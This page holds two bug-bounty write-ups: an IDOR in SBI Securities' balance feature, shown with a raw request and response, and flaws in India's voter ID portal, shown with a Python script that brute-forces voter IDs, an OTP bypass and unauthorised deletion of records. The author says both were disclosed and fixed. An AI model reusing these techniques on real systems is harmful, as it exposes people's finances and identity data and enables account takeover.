Aziz Al Aman

How I Managed to Check Anyone’s SBI Bank Balance Using Just a Phone Number

Tue, 21 Oct 2025 00:00:00 +0000

Hello Bug Hunters,

Hope your bounties💸 are treating you well. Recently, I opened a bank account with SBI (I usually prefer private banks, but needed this for specific reasons). Like many government banks, they pushed additional add-ons — insurance and a demat account. Not knowing these weren’t mandatory, I declined insurance but agreed to open a demat account.

The next day, I received my credentials via email and logged into my demat account. While exploring the platform, I noticed an interesting feature. Although I typically avoid testing assets that don’t offer rewards (no money, no bugs), I figured this would only take 5 minutes to test.

In this write-up, I’ll disclose a critical security flaw I discovered in SBI Bank’s system that allowed me to check anyone’s bank account balance using just their phone number or account number. (Target user doesn’t need to have a demat account - works on every SBI account holder)

Vulnerability Overview:

The vulnerability was an Insecure Direct Object Reference (IDOR) in the “Get Balance” feature of the SBI Securities demat account portal. By manipulating the AccountNo parameter, I was able to retrieve the account balance of any SBI bank account, regardless of whether it had a demat account.

Attack Prerequisites:

Getting Account details(Account Number):

Step 1: Obtaining Account Details:(still works)

The main challenge was obtaining the victim’s account number. From an attacker’s perspective, bank account numbers are not publicly available. However, I discovered that NSDL Payments Bank displays the receiver’s full account details, including the account number, IFSC code, and name, in transaction statements when money is sent via a phone number or UPI ID. Practically, obtaining these details requires initiating a small transaction, such as sending ₹1 to the victim.

Step 2: Exploiting the IDOR Vulnerability to Obtain the Account Balance:

After logging into my demat account, I found a feature called “Get Balance” that fetches the bank account balance linked to the demat account. This feature had a critical flaw.

The request contained a POST parameter &AccountNo=1234567890 that was vulnerable to IDOR. By replacing my account number with the victim’s account number, the response revealed:

The victim’s Account Balance & Account type (S=Savings, C=Current)

Technical Details:

Vulnerable Request:

POST /FundHoldandrelease?method=processOIResult HTTP/2
Host: trade.sbisecurities.in
Content-Type: application/x-www-form-urlencoded
Cookie: JSESSIONID=YOUR_SESSION_ID
User-Agent: Mozilla/5.0
Referer: https://trade.sbisecurities.in/authenticate

ClientId=400086XXXX&UserId=722XXX1&sClientType=IC&BankId=004&AccountNo=443854XXXXX&TransactionType=3&Flag=BL&Channel=I&Terminal=ITS&theForm=fundholdreleaseform&checkID=40008XXXXX

Response:

HTTP/2 200 OK
Content-Type: application/json
Content-Length: 37
Content-Security-Policy: report-uri /report-csp.php
X-Frame-Options: SAMEORIGIN
X-Content-Type-Options: nosniff
Strict-Transport-Security: max-age=31536000; includeSubDomains
Access-Control-Allow-Origin: https://trade.sbisecurities.in
Set-Cookie: BIGipServertrade.sbisecurities.in={redacted}; HttpOnly; Secure

{"code":"SUCCESS","data":"S|5407.19"}

The response format "S|5407.19" indicates:

S = Savings account type
5407.19 = Current account balance in INR

Disclosure and Resolution:

I responsibly disclosed this security flaw to CERT-In, and they coordinated with SBI to fix the issue.

I hope you found this writeup informative. If you have any questions, feel free to reach out to me on Linkedin.

May God reward you with goodness and abundant bounties.

— Aziz Al Aman

Exposing Millions of Voter ID card users’ details.

Thu, 07 Jul 2022 00:00:00 +0000

Hi, Everyone. hope you’re well. I’m Aziz. Through this write-up, I will share some security issues I’ve found on the official Voter ID card maintaining platform http://nvsp.in. I was filling out a correction form for my mom’s card, I’m not really interested in finding bugs on gov websites :`) that moment burpsuite was running in the background and I thought let’s have a try. After spending half an hour I found some critical issues that I’m going to share. All these issues are already fixed by the government.

In India, a Voter ID card is an identity document issued by the Election Commission of India to adult domiciles of India who have reached the age of 18, which primarily serves as an identity proof for Indian citizens while casting their ballot in the country’s municipal, state, and national elections. More than 780 million Voter IDs are active at present.

Bruteforcing valid Voter IDs and extracting details (IDOR / BOLA)

While registering a new account it shows two options “I have EPIC number” and “I don’t have EPIC number”. EPIC stands for Electors Photo Identification Card and the EPIC number is nothing but Voter ID no. If we chose we don’t have a Voter ID number then they will give you an option to add after registering on the portal. After registration, I tried to add any random EPIC no. with my account but it show it’s not valid. So I sent that HTTP request to burp intruder for brute-forcing.

A Voter ID also known as EPIC number is an alphanumerical ID, it contains three Alphabets at starting and seven numbers i.e. WRI2345678, RDH2345678, DTN2345678, YCV2345678, NLN2345678, XMB2345678, etc. These three alphabets are Not random alphabets, you can find similar IDs with similar these three alphabets in beginning but the rest seven digits are different.

I added the payload position on these seven-digit numbers on Epic_no= parameter i.e Epic_no=WRI$2345678$ (as you can see in the below screenshot.)

Adding payload position

Surprisingly there is no limitation implemented in the backend and I was able to send unlimited requests without getting blocked by firewall. As a result backend server responding 302 redirections for every valid voter ID. (As shown in the screenshot below)

Responding 302 for every valid voter ID

Then I wrote a python script that will brute force the values and give output all valid voter_IDs for me.

import urllib3
import requests
import time
from termcolor import colored
urllib3.disable_warnings()
start = time.perf_counter() 

cookies = {
    'nvsp': '4e565XXXXX',
    'cookiesession1': '678B286C164561FFEFXXXXXXXXXXX',
    'nvsp': '4e56XXXXX',
    'nvspid': 'ycnpiabqfasdf0asdf09ad',
    '__RequestVerificationToken': 'taDxPTIR3vxuyduujVCoi5eJdSlsAv1X0MQea7VYvLf6ksNDNsK7BkQZbNLSKagASDFpouasdfuopasfcsCmlofM6tTlC1opGS9FBEjYYXxC-z9ze73zdtEjUXtq9JfGVDfsXwt3WmQ925gSsbUw2',
    '.ASPXAUTH': '53BDCF7905E361CB6ECE80B77506A1A4A54DFS6546A5DF787AS8DFB2B9CE6874FDE524BF7BAE0DDC59329705AB29D49A148B4494341EC7634C13DB69FA25425DCA10CAADA3A10B025D58D8220E842959F0C650A8DF39B43039354B537BCE61AFB4922B99E22F20DC099C0DE9BC2CA53D1A37F387867855DDE5D89583B2F5F95D898A',
}

headers = {
    'Host': 'www.nvsp.in',
    'Cache-Control': 'max-age=0',
    'Sec-Ch-Ua': '".Not/A)Brand";v="99", "Google Chrome";v="103", "Chromium";v="103"',
    'Sec-Ch-Ua-Mobile': '?0',
    'Sec-Ch-Ua-Platform': '"Windows"',
    'Upgrade-Insecure-Requests': '1',
    'Origin': 'https://www.nvsp.in',
    'Content-Type': 'application/x-www-form-urlencoded',
    'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/103.0.0.0 Safari/537.36',
    'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9',
    'Sec-Fetch-Site': 'same-origin',
    'Sec-Fetch-Mode': 'navigate',
    'Sec-Fetch-User': '?1',
    'Sec-Fetch-Dest': 'document',
    'Referer': 'https://www.nvsp.in/Account/MyProfile',
    'Accept-Language': 'en-US,en;q=0.9',
    'Connection': 'close',
}


for voter_ID in range(2000000,2999999,1):


    data = '__RequestVerificationToken=dayrB-CCldwVYHXi7OE8b455jM3jLXRIdlHGQ5Wf4XyFE_7jjo1X3VfmkC4ZanqFO6h0XtveuAmSk1SIWWmV-SbA7nTUIJNKAfyRoiG43FvEAlDPi5VfkJWpGn9sV8IuFuBezLnC-tZSYFGqrRbECXgqlxpSduENgqaWy7oWQK01&OTP=&UserId=UQH34XXXXXXXX&firstName=Aziz&lastName=&Email=XXXXXXXX%40gmaill.com&Epic_no=WRI'+str(voter_ID)+'&PhoneNumber=XXXXXXXX87&st_code=S25&ac_no=55&PART_NO=42&Captcha=&Code='

    response = requests.post('https://www.nvsp.in/Account/MyProfile',allow_redirects=False, cookies=cookies, headers=headers, data=data, verify=False)

    if response.status_code == 302:
        print(f"Epic-ID FOUND = "+colored("WRI"+str(voter_ID),'green'))
    elif response.status_code == 200:
        print(colored("Not valid ID",'yellow'))
    else:
        print(colored("Session Expired ",'red')+"(response code = "+colored(str(response.status_code),'yellow')+")")

finish = time.perf_counter()

print(f'\n\nFinished in {round(finish-start, 2)} second(s)\n')

Now I have valid Voter IDs of random persons then, I added these IDs with my profile under “/Account/MyProfile”. Then there is an option under the “/forms/”section which is form001 and this form is already filled with **Name, father’s name, address, Date of birth, etc. **according to that valid EPIC ID added to my profile.

Extracted details of a random Person

Account takeover (OTP bypass)

On the profile details updating section I was trying to add another user’s number. So I created another account for it. But there was an OTP implanted there, and I tried to brute-force it but it didn’t work :( I remember reading an article last year, you can read it here, where the author just added 0 after intercepting the request. And I did the same thing here on OTP parameter and it worked :)

intercepting traffic while OTP is verifying

Changed the OTP value to zero

After bypassing I thought it just can register the victim’s number then I’ll reset the password, But surprisingly on replacing the victim’s number my profile data automatically changed with the victim’s details, And I can own his account.

Delete/remove any random user’s Voter ID card Permanently (Logic flaw)

From the 1st bug, we can get and add any random user’s Voter ID to our account, From that on the home page there is an option for “Deletion of Enrolment”. And nothing to be needed after an attacker added any random Voter ID on his profile section. then he can easily delete any random user’s Voter ID permanently.

An attacker can delete any random user’s card permanently

I reported these three issues to vdisclose@cert-in.org.in and they fixed these issues.

I hope you liked this article, If you have any questions then you can dm me on Twitter.

Thanks for reading,

Aziz